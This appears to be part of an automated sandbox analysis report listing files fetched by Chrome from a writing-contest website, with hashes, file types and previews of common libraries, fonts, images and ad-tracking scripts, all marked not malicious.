                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUce/awytU7W:1DY0h8Rx47OIqWbZ5e/awyL
                                                                                                                                                                                            MD5:9977A40D5C008A57ACBF1BD9FB1AD197
                                                                                                                                                                                            SHA1:EEAC027AC83315B3F44D7AEA755750815CFEC5A0
                                                                                                                                                                                            SHA-256:2FE7D4979B3D223AC1F6AC706A2498BAC10749CC2A1E5DE99ABAF92855C9F5CD
                                                                                                                                                                                            SHA-512:53F816FAFDB9F020AE39AF12DF48F2D0F1BA630169985931C7716AFC23D16D0386CBB0EC9D483E19B1FACE8262823F692A9590F8C75A021E1BBA8CAB1BFFB6A1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960086429&cv=11&fst=1731960086429&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (521)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):3381
                                                                                                                                                                                            Entropy (8bit):5.147445238900554
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:PfrrnJMia+5roHeCbMmQy/PFtFosTaajfNBvwE3:3rTJda+5roHDbMTy/TFosTaajfNBf
                                                                                                                                                                                            MD5:4D9A91BB66CFABD87602261B4B33D26A
                                                                                                                                                                                            SHA1:F52A9716BAFAE40D7F362E9A2499F9262FD682D6
                                                                                                                                                                                            SHA-256:78BF574AB08E486536EDF0D68A5B2CAD93E9DCAD0345E255E3428C51B6FC409E
                                                                                                                                                                                            SHA-512:1953DC44877E33CE905AAFF860813288B2504CA327A1293602C65E6276DF1B88C40304542CD57E011A85F1D9D93F8429871C588BCD9832B61BE93B5042DECFF0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/js/jquery.matchHeight-min.js
                                                                                                                                                                                            Preview:/*.* jquery-match-height 0.7.2 by @liabru.* http://brm.io/jquery-match-height/.* License MIT.*/.!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],t):"undefined"!=typeof module&&module.exports?module.exports=t(require("jquery")):t(jQuery)}(function(t){var e=-1,o=-1,n=function(t){return parseFloat(t)||0},a=function(e){var o=1,a=t(e),i=null,r=[];return a.each(function(){var e=t(this),a=e.offset().top-n(e.css("margin-top")),s=r.length>0?r[r.length-1]:null;null===s?r.push(e):Math.floor(Math.abs(i-a))<=o?r[r.length-1]=s.add(e):r.push(e),i=a}),r},i=function(e){var o={.byRow:!0,property:"height",target:null,remove:!1};return"object"==typeof e?t.extend(o,e):("boolean"==typeof e?o.byRow=e:"remove"===e&&(o.remove=!0),o)},r=t.fn.matchHeight=function(e){var o=i(e);if(o.remove){var n=this;return this.css(o.property,""),t.each(r._groups,function(t,e){e.elements=e.elements.not(n)}),this}return this.length<=1&&!o.target?this:(r._groups.push({elements:this,options:o}),r._
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 27 x 10, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1198
                                                                                                                                                                                            Entropy (8bit):6.259856503965695
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:M01htZdWwylZ82lYSqMHiWeA45AVGBDEVQVGB/T3ohyJ3V3TeAfGwA9vlhI7:M6qinNuiWeLlEB9JJ3JTem6vnI7
                                                                                                                                                                                            MD5:CC59B8489FF59000FFE150A3034675C8
                                                                                                                                                                                            SHA1:9CBA08AA9CD289D5E5CA91E854AB6B4A9FAB73D2
                                                                                                                                                                                            SHA-256:FD3E00D56AA64EDB7863C3766BF4107E813FC8B18C1B18D08B9CC24F6D437FD0
                                                                                                                                                                                            SHA-512:5D45D7E7A9C6F49AF777D1BA20D13968059E2161EB00651D49AE696472CDCAA250508E7FF812F7CF354B644626C408A3EDD3F99002E68A1D7634BC674392AA1B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR.............E^%k....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:C508247BAB39DE11919BBBE5BE681828" xmpMM:DocumentID="xmp.did:3B5D90C1379911E38CE7A04AE22DF9B7" xmpMM:InstanceID="xmp.iid:3B5D90C0379911E38CE7A04AE22DF9B7" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0A80117407206811822AAC03487464F8" stRef:documentID="uuid:C508247BAB39DE11919BBBE5BE681828"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1080x1080, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):92324
                                                                                                                                                                                            Entropy (8bit):7.767523494917731
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:xRl8OVBTdMzvrQf5mj5FmBA7yAzagXmkB76HNdmt+D1RZFa3kxtKk43d:DlzMQf5gmBdSyi7521RZFa30z4N
                                                                                                                                                                                            MD5:90AD6020B0FF07A94B4FDC1C5CEB2FA6
                                                                                                                                                                                            SHA1:1E438CF3C16247640725AC3B6F804A2DCFEA48AF
                                                                                                                                                                                            SHA-256:D4DF89DB629C1848B431605BFCB850E54FB91B1F68371A824162AF4BBD25F08E
                                                                                                                                                                                            SHA-512:2A387AD1761AA5A35F97DCEC0F08E5720AC7A1AA835ADC0FA5D1E50D245CDBAA39AFC880D432A8AA191B2716F181A9BA4F50CEA57EA01790C35BD90F3FDC7D76
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://scontent-ord5-1.cdninstagram.com/v/t51.2885-15/466782117_1219872592424759_7207578631427954565_n.jpg?_nc_cat=108&ccb=1-7&_nc_sid=18de74&_nc_ohc=bwWPeBBNLe4Q7kNvgEG96g1&_nc_zt=23&_nc_ht=scontent-ord5-1.cdninstagram.com&edm=AL-3X8kEAAAA&oh=00_AYBDimk3lRDq0ZNf5WzC3TsApGkaW3ypEC04xNJeJXPwgg&oe=67416EA5
                                                                                                                                                                                            Preview:......JFIF.............C...........................".##!. %*5-%'2( .?/279<<<$-BFA:F5;<9...C...........9& &99999999999999999999999999999999999999999999999999......8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...h....d.8.z..:........B..../........B..../...HwE.9.e.*......A.O....G.....A.O....G..t..}.r........B..../........B..../...!....f\....j.........4.j.........4{HwA...(...o..-?.......o..-?.........{9.e.*......A.O....G.....A.O....G..t..}.r........B..../........B..../...!....f\....j.........5i.dEt`..!..#..^..-..(..AE.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1572)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):20498
                                                                                                                                                                                            Entropy (8bit):5.22420494504574
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:3ynTfQQqY42j8kjn28QhqY42+ZFAEqY4CUHqY4gj0v:U1TMrEO74v
                                                                                                                                                                                            MD5:7D4B2BF659911D291E0F6A26D48549A0
                                                                                                                                                                                            SHA1:E7BFCD88A85E4E4F596C74D4C16EFE19584069F2
                                                                                                                                                                                            SHA-256:1243FA9556E39222589A8168CC6762520519AFDC708B20C27C3A7218FEA96444
                                                                                                                                                                                            SHA-512:A7398272BA2B5ADD71956A156980EA08491D35623248E9EEF6BBEAD7396C540369DC8DBC8E83F883416829328F2F371152C5222D5FF6A9071374B1F1E32B20A4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:"https://fonts.googleapis.com/css?family=Raleway:wght@400;700|Lora:400,700,400italic,700italic&display=swap"
                                                                                                                                                                                            Preview:/* cyrillic-ext */.@font-face {. font-family: 'Lora';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LLPtLp_A.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Lora';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LJftLp_A.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* math */.@font-face {. font-family: 'Lora';. font-style: italic;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LXftLp_A.woff2) format('woff2');. unicode-range: U+0302-0303, U+0305, U+0307-0308, U+0310, U+0312, U+0315, U+031A, U+0326-0327, U+032C, U+032F-0330, U+0332-0333, U+0338, U+033A, U+0346, U+034D, U+0391-03A1, U+03A3-03A9, U+03B1-03C9,
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:gzip compressed data, truncated
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):27
                                                                                                                                                                                            Entropy (8bit):3.169382490786664
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:Ftt4ipq4Wln:XtrxWl
                                                                                                                                                                                            MD5:8C843FFB840DECAC646424269B22D78B
                                                                                                                                                                                            SHA1:823D50FAA2E9D2D75CAEC02C2595C953F165F956
                                                                                                                                                                                            SHA-256:CF5E566DC08016A63E1667A2726699C3ADE378330F8E073CC4632D0D19B9F51E
                                                                                                                                                                                            SHA-512:C0C1F5624728CDBC57F55C77F6D59C53584F74731A25B8C2EC7C8CCE72725C7AB7A1E1266A8940F19E6C018D3E4A6FA36602987E7EC3680CFFE501A44289070C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pixel-config.reddit.com/pixels/t2_11an1ubt/config
                                                                                                                                                                                            Preview:...........................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (5544)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):259782
                                                                                                                                                                                            Entropy (8bit):5.556637469822717
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:zLJI6PFDXBd+zw08OH54P7o7U4RPACmQfU7B7mP9pLwhgFPO:nNDXB0TPNU7B7mP9pk
                                                                                                                                                                                            MD5:46B64AA903BC8C793A4439E6AAD624A8
                                                                                                                                                                                            SHA1:6F466DB4E7FE495D266DF9CEDEF912C2A578B19B
                                                                                                                                                                                            SHA-256:4C646229D6EE6F99CCD3C8E69430289FBB605260232BC98A70919D22D76E0143
                                                                                                                                                                                            SHA-512:4F40D63456E059D9C36685F35D8F45E1ED870B70859F96C29E8AC05CA80323B400B241A83A7C927FDB810658FF7E0DCACA60D0FB13F59FA0419B416C506DA599
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"16",. . "macros":[{"function":"__e"},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":true,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-216038-1","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__aev","vtp_varType":"TEXT"},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__e"},{"function":"__j","vtp_name":"slider_name"},{"function":"__v","vtp_name":"gtm.elementClasses
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 580 x 268, 8-bit colormap, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):29283
                                                                                                                                                                                            Entropy (8bit):7.985585050662447
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:fItkMyHsHgvdb/nfkwt4V5Ma+I3uIm+822UJ0:fI2BMHADH4PZ3uIf2UJ0
                                                                                                                                                                                            MD5:2F078897B95E7FCB6F1E93B0BBC54842
                                                                                                                                                                                            SHA1:B5D3B4F2CBB3D2CB8D52ECEE185D5961927E600B
                                                                                                                                                                                            SHA-256:EFB30BCE1EE52008949CE0B8E6DF353EF383A13BAD1D5D37C10868E18DA606C2
                                                                                                                                                                                            SHA-512:7712540FB23A20D4DC27AEFFF5B96EB1EC917D655DF228C9DACB8DE7C4D106CA88C65D3D8609BAC2B997891BE7945A23946F0791BB7CE42C067548BEB2D9C85C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...D...........Y.....tEXtSoftware.Adobe ImageReadyq.e<...hiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:0180117407206811822ABA53477E08B3" xmpMM:DocumentID="xmp.did:7F6962FA5A0B11E3A42C8A88B4C1AE94" xmpMM:InstanceID="xmp.iid:7F6962F95A0B11E3A42C8A88B4C1AE94" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0280117407206811822ABA53477E08B3" stRef:documentID="xmp.did:0180117407206811822ABA53477E08B3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..|g....PLTE....................{......)))....
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (723)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):7076
                                                                                                                                                                                            Entropy (8bit):5.52488676121649
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:bttd4a6O1T6ahNU3dJ+SrM0hjUYIW2WX8ISlY:bBJ1T9UNJ+SrM0lXV2WXXSlY
                                                                                                                                                                                            MD5:88A2E0A522036C0B87E03552E56629AA
                                                                                                                                                                                            SHA1:EC9D1157518E753A84DBDE1333A29B34CF776D63
                                                                                                                                                                                            SHA-256:788AFB96F2DA68E8729EC35F3D5E381FAD3482D37C54C2195C7311440EE4C27E
                                                                                                                                                                                            SHA-512:44B953878BD650FE2BCC8B6904620955C3E396B7DC8F41F85D021A8E0404DA41DB15C5499A03F7D4FE9129BB340AA3F6782942CF5327502FD4569BEBBB17073F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.googletagmanager.com/static/service_worker/4al0/sw.js?origin=https%3A%2F%2Fwinningwriters.com
                                                                                                                                                                                            Preview:'use strict';var k=function(a){function b(c){return a.next(c)}function e(c){return a.throw(c)}return new Promise(function(c,d){function f(h){h.done?c(h.value):Promise.resolve(h.value).then(b,e).then(f,d)}f(a.next())})};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var m=this||self;var u,v;a:{for(var x=["CLOSURE_FLAGS"],B=m,C=0;C<x.length;C++)if(B=B[x[C]],B==null){v=null;break a}v=B}var G=v&&v[610401301];u=G!=null?G:!1;var H;const I=m.navigator;H=I?I.userAgentData||null:null;function J(a){return u?H?H.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function K(a){var b;a:{const e=m.navigator;if(e){const c=e.userAgent;if(c){b=c;break a}}b=""}return b.indexOf(a)!=-1};function L(){return u?!!H&&H.brands.length>0:!1}function O(){return L()?J("Chromium"):(K("Chrome")||K("CriOS"))&&!(L()?0:K("Edge"))||K("Silk")};!K("Android")||O();O();!K("Safari")||O()||(L()?0:K("Coast"))||(L()?0:K("Opera"))||(L()?0:K("Edge"))||(L()?J("Microsoft Edge"):K("Edg/"))||L()&
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4896
                                                                                                                                                                                            Entropy (8bit):5.159533278174866
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:GKXaoFzzzQFRlRdrcNMo0Oy8ri4cSX2W4Leyg6y:GKIFX7rQitLo
                                                                                                                                                                                            MD5:8D62F421191B5BD4F40252DBD9044E58
                                                                                                                                                                                            SHA1:79DF8B1839CBCB82A0FD9738289EB43C1BC77026
                                                                                                                                                                                            SHA-256:DECDBAFE23CF0BBC33328FA33258981E64533EC713774DAA021CC786EAD1D753
                                                                                                                                                                                            SHA-512:7BE529F3A138C2F915EA915E1FB6922FB3978C848DE6798C4A075E014853010D4546C8B75A80F04D53D945AB0706B4615B8392FAF2A503F6CE4F6D8965B78722
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/fancybox/jquery.fancybox.css
                                                                                                                                                                                            Preview:/*! fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license */..fancybox-wrap,..fancybox-skin,..fancybox-outer,..fancybox-inner,..fancybox-image,..fancybox-wrap iframe,..fancybox-wrap object,..fancybox-nav,..fancybox-nav span,..fancybox-tmp.{..padding: 0;..margin: 0;..border: 0;..outline: none;..vertical-align: top;.}...fancybox-wrap {..position: absolute;..top: 0;..left: 0;..z-index: 8020;.}...fancybox-skin {..position: relative;..background: #f9f9f9;..color: #444;..text-shadow: none;..-webkit-border-radius: 4px;.. -moz-border-radius: 4px;.. border-radius: 4px;.}...fancybox-opened {..z-index: 8030;.}...fancybox-opened .fancybox-skin {..-webkit-box-shadow: 0 10px 25px rgba(0, 0, 0, 0.5);.. -moz-box-shadow: 0 10px 25px rgba(0, 0, 0, 0.5);.. box-shadow: 0 10px 25px rgba(0, 0, 0, 0.5);.}...fancybox-outer, .fancybox-inner {..position: relative;.}...fancybox-inner {..overflow: hidden;.}...fancybox-type-iframe .fancybox-inner {..-webkit-overflow-scrolling: touch;.}.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (32072)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):93100
                                                                                                                                                                                            Entropy (8bit):5.300526104474089
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:q4mCgi8DyCuXXFiJ+L0kJQsJVPEKLQRZdC/RlfDknv+p0WzH/IoSZ7qABZnu0sFv:qGsKXlI2p0WPSbDrstfam
                                                                                                                                                                                            MD5:E0E0559014B222245DEB26B6AE8BD940
                                                                                                                                                                                            SHA1:E2F3603E23711F6446F278A411D905623D65201E
                                                                                                                                                                                            SHA-256:89A15E9C40BC6B14809F236EE8CD3ED1EA42393C1F6CA55C7855CD779B3F922E
                                                                                                                                                                                            SHA-512:60740DA8F871B8263675DB2421B0E565FC18E95C772F7C3D5916F224263CD71A6A2E6ACCEAB2F6F8BA1C0607951F0198F525D87D0589FA57045B1D5F292DACF0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/*! jQuery v1.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/.(function(e,t){var n,r,i=typeof t,o=e.location,a=e.document,s=a.documentElement,l=e.jQuery,u=e.$,c={},p=[],f="1.10.2",d=p.concat,h=p.push,g=p.slice,m=p.indexOf,y=c.toString,v=c.hasOwnProperty,b=f.trim,x=function(e,t){return new x.fn.init(e,t,r)},w=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=/\S+/g,C=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,k=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,E=/^[\],:{}\s]*$/,S=/(?:^|:|,)(?:\s*\[)+/g,A=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,j=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,D=/^-ms-/,L=/-([\da-z])/gi,H=function(e,t){return t.toUpperCase()},q=function(e){(a.addEventListener||"load"===e.type||"complete"===a.readyState)&&(_(),x.ready())},_=function(){a.addEventListener?(a.removeEventListener("DOMContentLoaded",q,!1),e.removeEventListener("load",q,!1)):(a.detachEvent("onreadystatechange",q)
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):291890
                                                                                                                                                                                            Entropy (8bit):5.563073743986907
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:npJI6PFDXBd+Ym+0uVH54P7o7U4RPzToDV77yTQeRIB7mP90J0PO:pNDXB0YHPfIeRIB7mP9Q
                                                                                                                                                                                            MD5:C1A9462C0CD1B587046AE726F0A5E421
                                                                                                                                                                                            SHA1:4F722693D1B6CF066BB948AF32F66DC68793E96E
                                                                                                                                                                                            SHA-256:FE5B06B60AA9B029F2A4DE48C8709DB600B359327CEB9A6E02DC830F44B99621
                                                                                                                                                                                            SHA-512:C3844658DE8465C060CAA800053994009268ED34D97EC3E7F046C095EB9F55292B9CC97473209B7D1285F7C4E30034A164CE698451BA103E33C5794A476F71C6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.googletagmanager.com/gtag/js?id=AW-1072733940
                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-1072733940","tag_id":10},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_reg
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1489)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1490
                                                                                                                                                                                            Entropy (8bit):5.121732802736398
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:T4mkXEbajLeYDDjHuZXs14rigeWCF770cI13xlkTNFK+kTIT1sXINKpIJ71ITxn:cpWwLeYDAedF77+uHK+uIT1tKpOixn
                                                                                                                                                                                            MD5:E7AC890B1E97A9765AEC1DBBD53111E9
                                                                                                                                                                                            SHA1:54940DEE666A0CE2532974C0603C29E976F82622
                                                                                                                                                                                            SHA-256:B8C3232F67640F0036C0869239C6C5D54A0E9D7C34F1149352095AF48BFB2553
                                                                                                                                                                                            SHA-512:CF9368DCD87CACC28DEAFD8D22668F730FF8847A41AC13E8D8666419B2CC759F45E3CDFB80AF161320E377A782378B273DF28133D4754C621C53FDEB656575BC
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:$("[placeholder]").focus(function(){var i=$(this);i.val()==i.attr("placeholder")&&(i.val(""),i.removeClass("placeholder"))}).blur(function(){var i=$(this);(""==i.val()||i.val()==i.attr("placeholder"))&&(i.addClass("placeholder"),i.val(i.attr("placeholder")))}).blur().parents("form").submit(function(){$(this).find("[placeholder]").each(function(){var i=$(this);i.val()==i.attr("placeholder")&&i.val("")})}),$(function(){function i(){$(this).addClass("hover"),$("ul:first",this).css("visibility","visible")}function t(){$(this).removeClass("hover"),$("ul:first",this).css("visibility","hidden")}var o={sensitivity:3,interval:200,over:i,timeout:200,out:t};$("ul.dropdown li").hoverIntent(o),$("ul.dropdown li ul li:has(ul)").find("a:first").append(" &raquo; ")}),$.browser.msie&&$("body").addClass("ie"),$("a").each(function(){var i=new RegExp("/"+window.location.host+"/");i.test(this.href)||$(this).click(function(i){i.preventDefault(),i.stopPropagation(),window.open(this.href,"_blank")})}),$(docum
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (58876), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):58876
                                                                                                                                                                                            Entropy (8bit):5.405683338218142
                                                                                                                                                                                            Encrypted:false
